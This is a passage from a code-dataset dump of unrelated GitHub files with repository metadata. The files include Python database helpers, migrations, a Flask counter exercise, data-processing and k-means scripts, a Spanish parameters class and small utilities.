\"\"\"\n print(\"Committing to db...\")\n self.conn.commit()\n self.cursor.close()\n self.conn.close()\n\n def _connect(self):\n \"\"\" Connect to postgres DB with specified host and port\n \n Returns\n conn -- connection object\n \"\"\"\n try:\n conn = psycopg2.connect(dbname=self.dbname,\n user=self.user,\n password=self.password,\n host=self.host,\n port=self.port)\n return conn\n except psycopg2.OperationalError as e:\n print(e)\n\n\n\nif __name__ == \"__main__\":\n with Database('postgres/config.yaml') as cur: \n cur.execute(\"CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);\")\n cur.execute(\"INSERT INTO test (num, data) VALUES (%s, %s);\", (100, \"abc'def\"))\n cur.execute(\"SELECT * FROM test;\")\n res = cur.fetchone()\n print(res)\n cur.execute(\"DROP TABLE test;\")","repo_name":"jackhhchan/fact-verification-system","sub_path":"src/postgres/_deprecated/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41496181436","text":"import argparse\nimport logging\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\nfrom .. import config, tables # noqa: E402\n\n\ndef main():\n parser = argparse.ArgumentParser(\n \"A tool for running the automation locally\"\n )\n parser.add_argument(\"action\", choices=[\"poll\"])\n parser.add_argument(\n \"--table\",\n type=lambda val: getattr(tables, val.upper()),\n required=True,\n help=\"Which Airtable table to use\",\n )\n parser.add_argument(\n \"--live\",\n type=bool,\n default=False,\n help=\"Enables updating airtable records\",\n )\n\n args = parser.parse_args()\n\n conf = config.load()\n client = args.table.get_airtable_client(\n conf.airtable, read_only=not args.live\n )\n\n succeeded = True\n if args.action == \"poll\":\n succeeded = client.poll_table(conf)\n else:\n raise ValueError(\"Unsupported action: {}\".format(args.action))\n\n print(\"Succeeded!\" if succeeded else \"Failed!\")\n sys.exit(0 if succeeded else 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MerkleBros/automation_prime","sub_path":"automation/scripts/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"72839183926","text":"\"\"\"Inline parameters into ensembles\n\nRevision ID: 4effed76d1e2\nRevises: 98601344bcf5\nCreate Date: 2021-02-24 16:48:36.601870\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"4effed76d1e2\"\ndown_revision = \"98601344bcf5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table(\"parameter\")\n op.add_column(\n \"ensemble\", sa.Column(\"parameters\", sa.ARRAY(sa.FLOAT()), nullable=False)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column(\"ensemble\", \"parameters\")\n    op.create_table(\n        \"parameter\",\n        sa.Column(\"id\", sa.INTEGER(), autoincrement=True, nullable=False),\n        sa.Column(\n            \"time_created\",\n            postgresql.TIMESTAMP(),\n            server_default=sa.text(\"now()\"),\n            autoincrement=False,\n            nullable=True,\n        ),\n        sa.Column(\n            \"time_updated\",\n            postgresql.TIMESTAMP(),\n            server_default=sa.text(\"now()\"),\n            autoincrement=False,\n            nullable=True,\n        ),\n        sa.Column(\n            \"values\",\n            postgresql.ARRAY(postgresql.DOUBLE_PRECISION(precision=53)),\n            autoincrement=False,\n            nullable=False,\n        ),\n        sa.Column(\"ensemble_id\", sa.INTEGER(), autoincrement=False, nullable=False),\n        sa.ForeignKeyConstraint(\n            [\"ensemble_id\"], [\"ensemble.id\"], name=\"parameter_ensemble_id_fkey\"\n        ),\n        sa.PrimaryKeyConstraint(\"id\", name=\"parameter_pkey\"),\n    )\n    # ### end Alembic commands ###\n","repo_name":"equinor/ert-storage","sub_path":"src/ert_storage/_alembic/alembic/versions/4effed76d1e2_inline_parameters_into_ensembles.py","file_name":"4effed76d1e2_inline_parameters_into_ensembles.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"7640247489","text":"#!/usr/bin/python3\n\nimport sys\n\n\ndef errExit(msg, code):\n    print(msg, file=sys.stderr)\n    sys.exit(code)\n    \n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n    errExit(\"ERR: No args\", 1)\n    \nif len(args) > 1:\n    errExit(\"ERR: Too many args\", 1)\n\n\nfilename = args[0]\n\n\nnums = [] #contains a string like '0x00ab' for every word in the binary\n\nwith open(filename, \"rb\") as f:\n    while True:\n        b = f.read(2)\n\n        if len(b) == 0:\n            break\n\n        elif len(b) == 2:\n            #parse them\n            val = int.from_bytes(b, byteorder='little', signed=False)\n            nums.append(\"0x{:04x}\".format(val))\n\n        elif len(b) == 1:\n            print(\"Error: file ends on odd number of bytes\" ,file=sys.stderr)\n            sys.exit(1)\n\n        else:\n            print(\"????\", file=sys.stderr)\n            sys.exit(1)\n\n\nprint(\"int16_t starting_code[] = {\")\n\nints_per_line = 16\noffset = 0\n\nwhile len(nums) - offset > 0:\n    line_str = \"/* 0x{:04x}: */\".format(offset)\n\n    line_data = nums[offset:offset+ints_per_line]\n    line_str += \" \" + \",\".join(line_data)\n    offset += len(line_data)\n\n    if(len(nums) - offset > 0):\n        line_str = line_str + \",\"\n\n\n    print(line_str)\n\n\nprint(\"};\")\nprint(\"const uint16_t starting_code_length = 0x{:x};\".format(offset))\n","repo_name":"jvorob/subleq-bootstrap","sub_path":"tools/bin_to_header.py","file_name":"bin_to_header.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14645860360","text":"from flask import Flask, render_template, request, redirect, session\n\napp = Flask(__name__)\napp.secret_key = 'keep it secret, keep it safe'\n\n@app.route('/')\ndef index():\n    if \"count\" not in session:\n        session[\"count\"] = 1\n    else:\n        session[\"count\"] +=1\n    return render_template(\"index.html\")\n\n@app.route('/count', methods = [\"POST\"])\ndef one_count():\n    if request.form[\"change\"]==\"add\": #this will add to the counter as the add button is clicked\n        session[\"count\"]+=1\n    elif request.form[\"change\"]==\"reset\":\n        session[\"count\"]=0 #this will reset the counter to 0 when the reset button is clicked\n    return redirect(\"/\") #cannot put render_template under POST\n\n@app.route('/destroy')\ndef destroy():\n    session.clear() #this will clear previous count\n    return redirect(\"/\")\n\nif __name__ == 
\"__main__\":\n app.run(debug=True)","repo_name":"PamMaw23/Python-Counter","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19970629283","text":"from scipy.spatial import distance\nfrom sklearn.cluster import KMeans\nfrom os import system\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom visualizations import show_clusters_centroids\n\ndef distancia(lista1,lista2):\n #import pdb; pdb.set_trace()\n dist = distance.euclidean(lista1, lista2)\n return dist\n\ndef centros(lista):\n # Create an empty list for the new centers\n centros_list = []\n\n # Convert the list into a numpy array\n listasnonpy = np.array(lista, dtype=object)\n\n for i in listasnonpy:\n centros_list.append(np.mean(i, axis = 0))\n return centros_list\n\ndef cercanos(puntos,centros):\n lista=[[]for x in centros]\n #import pdb; pdb.set_trace()\n for i, punto in enumerate(puntos):\n dist=[]\n for j, centro in enumerate(centros):\n dist.append(distancia(punto,centro))\n small=np.argmin(dist)\n lista[small].append(punto)\n return lista\n\ndef k_means(puntos):\n cantidad_de_centros = 0\n points = np.array(puntos)\n\n cantidad_de_centros = int(input(\"Elija la cantidad de centros: \"))\n system('clear')\n iterationts = int(input(\"Elija la cantidad de iteraciones: \"))\n\n idx = np.random.randint(len(points),size=cantidad_de_centros)\n k_lista = points[idx,:]\n clusters = cercanos(points, k_lista)\n\n # Redifine puntos and centers adjusting with the methods cercanos() and centros()\n for i in range(iterationts):\n if i % 1 == 0:\n if i == 0:\n title = \"Initialization\"\n else:\n title = \"Iteration {}\".format(i+1)\n\n show_clusters_centroids(clusters, k_lista, title)\n clusters = cercanos(points, k_lista)\n k_lista = centros(clusters)\n\n # Return the new adjustes list\n return clusters, k_lista\n\ndef generarPuntos(i, j):\n puntos = []\n for cony in range(i):\n lista=[]\n for conx in range(j):\n lista.append(random.randint(0, 5000))\n puntos.append(lista)\n return puntos\n\n# def generarPuntos(i):\n# lista = []\n# for con in range(i):\n# lista.append(random.randint(0, 100))\n# return np.array(lista)\n\n\nif __name__ == '__main__':\n system('clear')\n system('clear')\n puntos = generarPuntos(200, 8)\n # print(\"Antes: \")\n # print(puntos)\n cluster=k_means(puntos)\n print(\"Despues: \")\n print(cluster)\n","repo_name":"brilubel15/Equipo6","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3485504829","text":"''' 075 Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em um tupla. 
No final, mostre:\nquantas vezes apareceu o valor 9\nem que posição foi digitado o primeiro valor 3\nquais foram os números pares '''\n\ntupla = (int(input('Digite o primeiro valor: ')),\n int(input('Digite segundo valor: ')),\n int(input('Digite terceiro valor: ')),\n int(input('Digite quarto valor: '))) # forma de criar um tupla, lembrar que a tupla é imutável\n\nprint(tupla)\n\ncontpares = cont9 = 0\n\nfor n in tupla:\n print(n)\n if n == 9:\n cont9 += 1\n if n % 2 == 0:\n contpares += 1\nprint(f'O valor 9 apareceu {cont9} vezes')\nprint(f'O valor 9 foi digitado {tupla.count(9)}') # forama direta de contar dentro da tupla\nif 3 in tupla:\n print(f'O número 3 apareceu na {tupla.index(3) + 1} posição') # retira o erro caso não seja digitado o 3\nelse:\n print('O valor 3 não foi digitado!')\n\nprint(f'Os valores pares digitados foram {contpares}')\n","repo_name":"Carlos-DOliveira/cursoemvideo-python3","sub_path":"pacote-download/d075 - Análise de dados com tupla.py","file_name":"d075 - Análise de dados com tupla.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6587389633","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def isBalanced(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n def _isBalanced(root):\n if root:\n left_depth, left_balance = _isBalanced(root.left)\n right_depth, right_balance = _isBalanced(root.right)\n bal_res = left_balance and right_balance and abs(left_depth-right_depth) <= 1\n depth = max(left_depth, right_depth)\n return depth+1, bal_res\n else:\n return 0, True\n _, res = _isBalanced(root)\n return res\n\n\"\"\"\ncheck the depth of none\n\"\"\"\n","repo_name":"wangyunge/algorithmpractice","sub_path":"cn/110.py","file_name":"110.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24198690510","text":"import datetime\n\nfrom sqlalchemy import delete as sqlalchemy_delete, desc, or_\nfrom sqlalchemy import update as sqlalchemy_update\nfrom sqlalchemy.future import select\nfrom db import Base, db\n\ndb.init()\n\n\nclass AbstractClass:\n @staticmethod\n async def commit():\n try:\n await db.commit()\n except Exception:\n await db.rollback()\n raise\n\n @classmethod\n async def create(cls, **kwargs):\n object_ = cls(**kwargs)\n db.add(object_)\n await cls.commit()\n return object_\n\n @classmethod\n async def update(cls, id_, **kwargs):\n query = (\n sqlalchemy_update(cls)\n .where(cls.chat_id == id_)\n .values(**kwargs)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await cls.commit()\n\n @classmethod\n async def update_bird(cls, id_: str, type_: int, **kwargs):\n query = (\n sqlalchemy_update(cls)\n .where(cls.chat_id == id_, cls.type == type_)\n .values(**kwargs)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await cls.commit()\n\n @classmethod\n async def get(cls, id_):\n query = select(cls).where(cls.chat_id == id_)\n objects = await db.execute(query)\n object_ = objects.first()\n return object_\n\n @classmethod\n async def delete(cls, id_):\n query = (\n sqlalchemy_delete(cls)\n .where(cls.chat_id == id_)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await 
cls.commit()\n\n @classmethod\n async def get_all(cls):\n query = select(cls)\n objects = await db.execute(query)\n return objects.all()\n\n @classmethod\n async def get_top(cls, name: str):\n query = select(cls).order_by(desc(name)).limit(10)\n objects = await db.execute(query)\n return objects.all()\n\n @classmethod\n async def get_birds(cls, id_):\n query = select(cls).where(\n cls.chat_id == id_,\n or_(\n cls.mutation >= datetime.datetime.now(),\n cls.vitamin >= datetime.datetime.now()\n )\n )\n objects = await db.execute(query)\n object_ = objects.all()\n return object_\n\n\nclass CreatedModel(Base, AbstractClass):\n __abstract__ = True\n","repo_name":"projectsmuhammadnur/FarmBot","sub_path":"db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45165586226","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom matplotlib import pyplot as plt\nimport glob\nimport os\nimport re\n\nroot = os.getcwd() #get the current working directory\n\nif os.path.exists('summary_H2S.csv'): # check if the summary csv already exists\n print ('The program will not proceed if the summary_H2S csv file already exists') # check if the summary csv already exists\nelse:\n file_dir = glob.glob(root+'\\\\*.csv')\n summary_H2S= []\n for file_name in file_dir:\n table =[]\n Site_ID = os.path.basename(file_name).split('.')[0]\n\n with open(file_name,'r') as f:\n lines = f.readlines()\n for n in range(len(lines)):\n if 'Date' in lines[n] or 'Time Stamp' in lines[n]:\n table_header =n\n if 'EVENTS' in lines[n]:\n table_end = n\n lines[n] = lines[n].split(',')\n\n table =lines[table_header+1:table_end]\n columns = lines[table_header]\n\n # Replace the H2S () to H2S (PPM)\n for n, i in enumerate(columns):\n if i == 'H2S ()':\n columns[n] = 'H2S (PPM)'\n if i =='Time Stamp\\n':\n columns[n] = 'Time Stamp'\n\n table_df = pd.DataFrame(table, columns=columns)\n table_df = table_df.replace(r'\\n', '', regex=True)\n table_df['Time Stamp'] = pd.to_datetime(table_df['Time Stamp'])\n table_df['Site_ID'] = Site_ID\n table_df = table_df[['Time Stamp','H2S (PPM)','Site_ID']]\n\n # Considering the PPB scenario and remove the initial and last zeros\n if 'ppb' in Site_ID or 'PPB' in Site_ID:\n table_df['H2S (PPM)'] =table_df['H2S (PPM)'].astype('float64')*0.001\n else:\n none_zero_list =[] # obtain the list of the entries that are not zero\n for i in range(len(table_df)):\n if table_df['H2S (PPM)'][i] != '0':\n none_zero_list.append(i)\n none_zero_st = min(none_zero_list) # the first none zero\n none_zero_ed = max(none_zero_list) # the last none zero\n table_df = table_df[none_zero_st:none_zero_ed+1] # eleminating the first and last zeros in the dataframe\n\n pattern = r'\\{.+\\}'\n table_df['Site_ID'] = re.sub(pattern, '', Site_ID)\n table_df['Site_ID'] = table_df['Site_ID'].str.strip()\n\n summary_H2S.append(table_df) #combine all sites'data into a dataframe\n\n\n summary_H2S = pd.concat(summary_H2S, axis=0).reset_index().drop(columns=['index'])\n summary_H2S = summary_H2S.sort_values(['Site_ID','Time Stamp'], ascending=[True, True])\n summary_H2S.to_csv(root + '\\\\summary_H2S.csv', index=False)\n\n\n\n\n\n","repo_name":"xphn/19-0327-demo","sub_path":"H2S_data.py","file_name":"H2S_data.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26743686061","text":"# 
-------------------------------------------------------------------\n# Módulo entParametros.py\n# Clase para manejar información de Parámetros del Sistema\n# -------------------------------------------------------------------\n\n# Definición de la Clase\nclass eParametros:\n\n # Constructor\n def __init__(self):\n\n # Propiedades correspondientes a las Columnas de la Tabla\n self.__intMensajesExito = -1\n self.__intAgruparProductos = -1\n self.__intVerificarExistencias = -1\n self.__intImprimirTicket = -1\n self.__intBitacoraActiva = -1\n self.__strMensajeTicket = \"\"\n self.__strMonedaSimbolo = \"\"\n self.__strMonedaNombre = \"\"\n\n \n # Setter's y Getter's\n def setIntMensajesExito(self,mensajeExito):\n if (mensajeExito<0 or mensajeExito>1):\n print(\"Error al asignar el Mensaje de Exito:\",mensajeExito, \"; valores posibles:0,1\")\n else: \n self.__intMensajesExito = mensajeExito\n\n def getIntMensajesExito(self):\n return self.__intMensajesExito\n\n def setIntAgruparProductos(self,agruparProductos):\n if (agruparProductos<0 or agruparProductos>1):\n print(\"Error al asignar Agrupar Productos:\",agruparProductos, \"; valores posibles:0,1\")\n else: \n self.__intAgruparProductos = agruparProductos\n\n def getIntAgruparProductos(self):\n return self.__intAgruparProductos\n\n def setIntVerificarExistencias(self,verificarExistencias):\n if (verificarExistencias<0 or verificarExistencias>1):\n print(\"Error al asignar Verificar Existencias:\",verificarExistencias, \"; valores posibles:0,1\")\n else: \n self.__intVerificarExistencias = verificarExistencias\n\n def getIntVerificarExistencias(self):\n return self.__intVerificarExistencias\n\n def setIntImprimirTicket(self,imprimirTicket):\n if (imprimirTicket<0 or imprimirTicket>1):\n print(\"Error al asignar Imprimir Ticket:\",imprimirTicket, \"; valores posibles:0,1\")\n else: \n self.__intImprimirTicket = imprimirTicket\n\n def getIntImprimirTicket(self):\n return self.__intImprimirTicket\n\n def setIntBitacoraActiva(self,bitacoraActiva):\n if (bitacoraActiva<0 or bitacoraActiva>1):\n print(\"Error al asignar Bitácora Activa:\",bitacoraActiva, \"; valores posibles:0,1\")\n else:\n self.__intBitacoraActiva = bitacoraActiva\n\n def getIntBitacoraActiva(self):\n return self.__intBitacoraActiva\n\n def setStrMensajeTicket(self,mensajeTicket):\n if (len(mensajeTicket) > 40):\n print(\"Error al asignar Mensaje Ticket:\",mensajeTicket, \"; longitud máxima 40 caracteres\")\n else:\n self.__strMensajeTicket = mensajeTicket\n\n def getStrMensajeTicket(self):\n return self.__strMensajeTicket\n\n def setStrMonedaSimbolo(self,monedaSimbolo):\n if (len(monedaSimbolo) > 1):\n print(\"Error al asignar Moneda Símbolo:\",monedaSimbolo, \"; longitud máxima 1 caracteres\")\n else:\n self.__strMonedaSimbolo = monedaSimbolo\n\n def getStrMonedaSimbolo(self):\n return self.__strMonedaSimbolo\n\n def setStrMonedaNombre(self,monedaNombre):\n if (len(monedaNombre) > 10):\n print(\"Error al asignar Moneda Nombre:\",monedaNombre, \"; longitud máxima 10 caracteres\")\n else:\n self.__strMonedaNombre = monedaNombre\n\n def getStrMonedaNombre(self):\n return self.__strMonedaNombre\n \n# Función main\nif __name__ == \"__main__\":\n\n # Cargo la libreria\n from PyQt5 import QtWidgets\n\n # Importa la librería sys\n import sys\n\n # Crea el objeto de Aplicación\n app = QtWidgets.QApplication(sys.argv)\n\n # Crea un objeto de la Clase\n oParametros = eParametros()\n\n # Le coloca datos al objeto; setter's\n oParametros.setIntAgruparProductos(1)\n 
oParametros.setIntBitacoraActiva(1)\n oParametros.setIntImprimirTicket(1)\n oParametros.setIntMensajesExito(1)\n oParametros.setIntVerificarExistencias(1)\n oParametros.setStrMensajeTicket(\"! Felices Fiestas !\")\n oParametros.setStrMonedaNombre(\"Pesos M.N.\")\n oParametros.setStrMonedaSimbolo(\"$\")\n \n\n # Desplegando la información; getter's\n print(\"Agrupar Productos :\",\"Sí\" if (oParametros.getIntAgruparProductos()==1) else \"No\")\n print(\"Bitacora Activa :\",\"Sí\" if (oParametros.getIntBitacoraActiva()==1) else \"No\")\n print(\"Imprimir Ticket :\",\"Sí\" if (oParametros.getIntImprimirTicket()==1) else \"No\")\n print(\"Mensajes Éxito :\",\"Sí\" if (oParametros.getIntMensajesExito()==1) else \"No\")\n print(\"Verificar Existencias :\",\"Sí\" if (oParametros.getIntVerificarExistencias()==1) else \"No\")\n print(\"Mensaje Ticket :\",oParametros.getStrMensajeTicket())\n print(\"Moneda Nombre :\",oParametros.getStrMonedaNombre())\n print(\"Moneda Simbolo :\",oParametros.getStrMonedaSimbolo())\n\n ","repo_name":"marcelo-de/Curso","sub_path":"entidades/sistema/entParametros.py","file_name":"entParametros.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23832091934","text":"#!/usr/bin/python3\n\"\"\"0-hbtn_status module\"\"\"\nimport requests\nimport sys\n\n\ndef main(req, data):\n \"\"\"handles http request and print response\"\"\"\n response = requests.post(req, data=data)\n try:\n json_data = response.json()\n if len(json_data) == 0:\n print(\"No result\")\n else:\n print(\"[{}] {}\".format(json_data['id'], json_data['name']))\n except Exception:\n print(\"Not a valid JSON\")\n\n\nif __name__ == \"__main__\":\n # config\n if len(sys.argv) > 1:\n data = {'q': sys.argv[1]}\n else:\n data = {'q': ''}\n url = \"http://0.0.0.0:5000/search_user\"\n # init\n main(url, data)\n","repo_name":"aristizabaru/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/8-json_api.py","file_name":"8-json_api.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28221087793","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\n\r\nstudent_data = pd.read_csv(\"student-alcohol-consumption.csv\")\r\n\r\n# Change to make subplots based on study time\r\nsns.relplot(x=\"absences\", y=\"G3\", \r\n data=student_data,\r\n kind=\"scatter\",\r\n col=\"study_time\"\r\n )\r\n\r\n# Show plot\r\nplt.show()\r\n\r\n#arrange the plots in rows instead of columns\r\nsns.relplot(x=\"absences\", y=\"G3\", \r\n data=student_data,\r\n kind=\"scatter\", \r\n row=\"study_time\")\r\n\r\n# Show plot\r\nplt.show()","repo_name":"beyremweslati/DataScience-with-Python","sub_path":"Introduction to Data Visualization with Seaborn/Chapter2/subplots_with_col_row.py","file_name":"subplots_with_col_row.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"20005599208","text":"import os, sys\nimport xmltodict\n\nproj_path = \"/Users/crawforb/Projects/Development/PyCharmProjects/BCC/\"\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'BCC.settings')\nsys.path.append(proj_path)\nos.chdir(proj_path)\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\nimport refdata.models\n\nwith open('refdata/data-import/languages.xml') as fd:\n doc = 
xmltodict.parse(fd.read())\n\n for language in doc['DataExchange']['root']['Language']:\n new_lang = refdata.models.Language()\n new_lang.ebxid = language['base'].get('id', None)\n new_lang.name = language['base'].get('name', None)\n new_lang.code2 = language.get('code2', None)\n new_lang.code3 = language.get('code3', None)\n new_lang.save()\n","repo_name":"blakecrawford/BCC","sub_path":"BCC/refdata/data-import/import-languages.py","file_name":"import-languages.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43182639279","text":"import urllib.request\n\ndef read_text():\n quotes = open(\"/Users/yp/study/udacity/udacity_PFwithPy/check_profanity/movie_quotes.txt\")\n contents_of_file = quotes.read()\n # print(contents_of_file)\n check_profanity(contents_of_file)\n quotes.close()\n\ndef check_profanity(text_to_check):\n url = \"http://www.wdylike.appspot.com/?q=\" + text_to_check\n #url = \"http://www.wdylike.appspot.com/?q=shit\"\n # print(url)\n req = urllib.request.Request(url)\n conn = urllib.request.urlopen(req)\n output = str(conn.read().decode('utf-8').strip())\n # print(output)\n conn.close()\n\n if \"true\" in output:\n print(\"Profanity Alert!!\")\n elif \"false\" in output:\n print(\"this document has no curse word!\")\n else :\n print(\"could not scan the document properly.\")\n\nread_text()","repo_name":"hanlsin/udacity_PFwithPy","sub_path":"check_profanity/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219781343","text":"from __future__ import unicode_literals\n\nimport uuid\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\nimport django_changeset.models.mixins\nimport django_userforeignkey.models.fields\n\nimport eric.core.models.abstract\nimport eric.core.models.base\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('projects', '0092_resource_update_user_availability_choice_text'),\n ('labbooks', '0008_add_description'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='LabbookSection',\n fields=[\n ('created_at', models.DateTimeField(auto_now_add=True, db_index=True, null=True, verbose_name='Date when this element was created')),\n ('last_modified_at', models.DateTimeField(auto_now=True, db_index=True, null=True, verbose_name='Date when this element was last modified')),\n ('version_number', django_changeset.models.mixins.ChangesetVersionField(default=0)),\n ('deleted', models.BooleanField(db_index=True, default=False, verbose_name='Whether this entry is deleted or not')),\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('date', models.DateField(verbose_name='Date of the LabBook section')),\n ('title', models.CharField(max_length=128, verbose_name='Title of the LabBook section')),\n ('child_elements', models.ManyToManyField(blank=True, related_name='labbooksection', to='labbooks.LabBookChildElement', verbose_name='Which LabBookChildElements is this LabBook section associated to')),\n ('created_by', django_userforeignkey.models.fields.UserForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='labbooksection_created', to=settings.AUTH_USER_MODEL, 
verbose_name='User that created this element')),\n                ('last_modified_by', django_userforeignkey.models.fields.UserForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='labbooksection_modified', to=settings.AUTH_USER_MODEL, verbose_name='User that last modified this element')),\n                ('projects', models.ManyToManyField(blank=True, to='projects.Project', verbose_name='Which projects is this LabBook section associated to')),\n            ],\n            options={\n                'verbose_name_plural': 'LabbookSections',\n                'ordering': ['date', 'title'],\n                'verbose_name': 'LabbookSection',\n                'permissions': (('view_labbooksection', 'Can view a LabBook section'), ('trash_labbooksection', 'Can trash a LabBook section'), ('restore_labbooksection', 'Can restore a LabBook section'), ('change_project_labbooksection', 'Can change the project of a LabBook section'), ('add_labbooksection_without_project', 'Can add a LabBook section without a project')),\n            },\n            bases=(django_changeset.models.mixins.RevisionModelMixin, eric.core.models.base.LockMixin, eric.core.models.abstract.WorkbenchEntityMixin, models.Model),\n        ),\n    ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/labbooks/migrations/0009_add_labbooksection.py","file_name":"0009_add_labbooksection.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"35055100042","text":"#Используя функции и аргументы напишите программу с помощью коструктора#:\n#На вход в программу подаётся число от 250 до 10000. Число обозначает\n#количество патронов.\n#Скорострельность пулемёта 1200 выстрелов в минуту. В одной пулемётной ленте\n#250 патронов. На смену ленты уходит 20 секунд.\n#За сколько секунд пулемётчик расстреляет все патроны, если считать что первая\n#лента уже установлена в пулемёт?\n#Если число на входе не попадает в диапазон, вывести: Введите число от 250 до\n#10000.\n\n\nimport math\n\n\nclass Task2():\n\n    def __init__(self, int_inp):\n        self.int_inp = int_inp\n        res = str((int_inp / 1200) * 60 + ((math.ceil(int_inp / 250) - 1) * 20))\n\n        self.output(int_inp, res)\n\n    def output(self, int_inp, res):\n        self.res = res\n        if 250 > self.int_inp or self.int_inp > 10000:\n            print('Введите число от 250 до 10000.')\n        else:\n            print(f'Патроны закончатся через {self.res} секунд')\n\n\nresult = Task2 (int(input('Введите количество патронов: ')))","repo_name":"tarantot/python-for-pentester-tasks","sub_path":"Classes & OOP/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33682842413","text":"import argparse\nimport numpy as np\nimport os\nimport pickle\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.covariance import LedoitWolf\nfrom scipy.spatial.distance import mahalanobis\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom efficientnet_pytorch import EfficientNet\n\nimport datasets.mvtec as mvtec\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser('MahalanobisAD')\n    parser.add_argument(\"--model_name\", type=str, default='efficientnet-b4')\n    parser.add_argument(\"--save_path\", type=str, default=\"./result\")\n    return parser.parse_args()\n\n\ndef main():\n\n    args = parse_args()\n    assert args.model_name.startswith('efficientnet-b'), 'only support 
